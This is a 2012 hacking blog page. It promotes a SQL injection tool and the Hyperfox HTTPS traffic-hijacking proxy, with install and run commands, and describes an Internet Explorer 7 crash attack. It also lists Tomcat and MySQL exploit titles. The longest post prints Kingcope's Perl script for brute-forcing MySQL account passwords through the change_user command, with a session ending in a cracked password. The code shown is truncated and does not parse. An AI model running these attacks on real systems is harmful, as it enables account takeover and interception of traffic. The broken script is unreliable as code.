Dec 7, 2012

jSQL Injection - Java based automated SQL injection tool

An easy to use SQL injection tool to retrieve database informations from a distant server.
jSQL Injection features:
  • GET, POST, header, cookie methods
  • normal, error based, blind, time based algorithms
  • automatic best algorithms detection
  • data retrieving progression
  • proxy setting
  • evasion
  • for now supports MySQL
Download the java executable here, or access the source code for programmers in the Google Git repository. Current tools used for development: w7 eclipse easyphp notepad++ egit.
Next work: speed increase (100% faster, literally), more blind testing, automatic code testing (JUnit) 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 6, 2012

Hyperfox transparently hijacking/proxying HTTP and HTTPs traffic


Before installing, make sure you have a working Go environment and git.
Check that your PATH and GOPATH variables are correctly set in your .bashrc, .zshrc or .profile file.
$ cat .zshrc
# ... stuff ...
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
And that pkg, src and bin exist.
$ mkdir -p $GOPATH/src
$ mkdir -p $GOPATH/bin
$ mkdir -p $GOPATH/pkg
Now attempt to install.
% go get
% hyperfox -h

Usage example

Run hyperfox, it will start in HTTP mode listening at by default.
% hyperfox
If you want to analyze HTTPs instead of HTTP, use the -s flag and provide appropriate cert.pem and key.pem files.
% hyperfox -s -c ssl/cert.pem -k ssl/key.pem
hyperfox won’t be of much use if the host machine has no traffic to analyze or if the only traffic to analyze is its own.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

DoS vulnerabilities in Internet Explorer 7 (access violation)

Affected products:

Vulnerable are Internet Explorer 7 (7.00.5730.13) and other versions of IE7.
IE6 and IE8 are not affected.



When a redirector with response 301, 302 or 303 and data: URI in Location
header included into a tag frame or iframe, the browser crashes (the attack
doesn't work with other 30x statuses). It happens due to access violation
(aka segmentation fault) in iexplore.exe.


This is 302 redirector on Perl. You can make similar redirectors with 301,
302 or 303 statuses.

As 301 redirector you can use my example with data: URI at TinyURL:

The attack works from the second attempt. So it's needed to go to redirector
twice (to set URL twice in address bar, or after appearing of error page to
return to previous page in the browser).

Example of attack with this redirector via vulnerability
( at United Nations' site (they haven't
fixed it since 29.04.2010, when I've found this hole and informed UN, so you
can use it for checking purposes):

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 5, 2012

Interesting Exploit in 2012-12-05[Apache Tomcat]

Apache Tomcat 6.x / 7.x Denial Of Service

Apache Tomcat Security Bypass

Apache Tomcat CSRF Prevention Filter Bypass

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 4, 2012

MySQL Local/Remote FAST Account Password Cracking By Kingcope

The attacker logs into the mysql server with an unprivileged account.
There is a command in mysql called change_user, this command can be used
as the name suggests to change a user during a mysql session.
Since mysql is very fast in doing this it is much more powerful to crack
passwords rather than reconnecting every time to the mysql server to
brute force passwords
(what would be VERY slow).
Since the SALT does not change (and this is the weak point) in the
change_user command
it is a convienent way to crack passwords. (When connecting to mysql
in each connection
attempt the SALT is always different and sent out by the server). 
use Net::MySQL;


my $mysql = Net::MySQL->new(
 hostname => '',
 database => 'test',
 user     => "user",
 password => "secret",
 debug => 0,

$crackuser = "crackme";

while(<stdin>) {
$currentpass = $_;

$vv = join "\0",
                        $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
                ) . "\0";
if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
example session:

hn --incremental --stdout=5 | perl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Intesting Exploit in 2012-12-04 [Oracle, Web Application]

Oracle MySQL Privilege Escalation

vBulletin 3.x <= 4.2.0 FAQ (Echo config) bug 

Oracle MySQL 5.5.19-log Denial Of Service

Oracle MySQL Windows Stuxnet Technique SYSTEM Exploit

Oracle MySQL User Account Enumeration Utility

RIM BlackBerry PlayBook OS Local File Access Vulnerability

vBulletin 4.2.0 Full Path Disclosure Vulnerability

Wordpress 3.4.2 Full Path Disclosure Vulnerability



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 2, 2012

Interesting Exploit 2012-12-02 [MySQL]

MySQL (Linux) Heap Based Overrun PoC Zeroday

MySQL Denial of Service Zeroday PoC

MySQL (Linux) Database Privilege Elevation Zeroday Exploit

MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)

MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday

MySQL Remote Preauth User Enumeration Zeroday Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit

MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.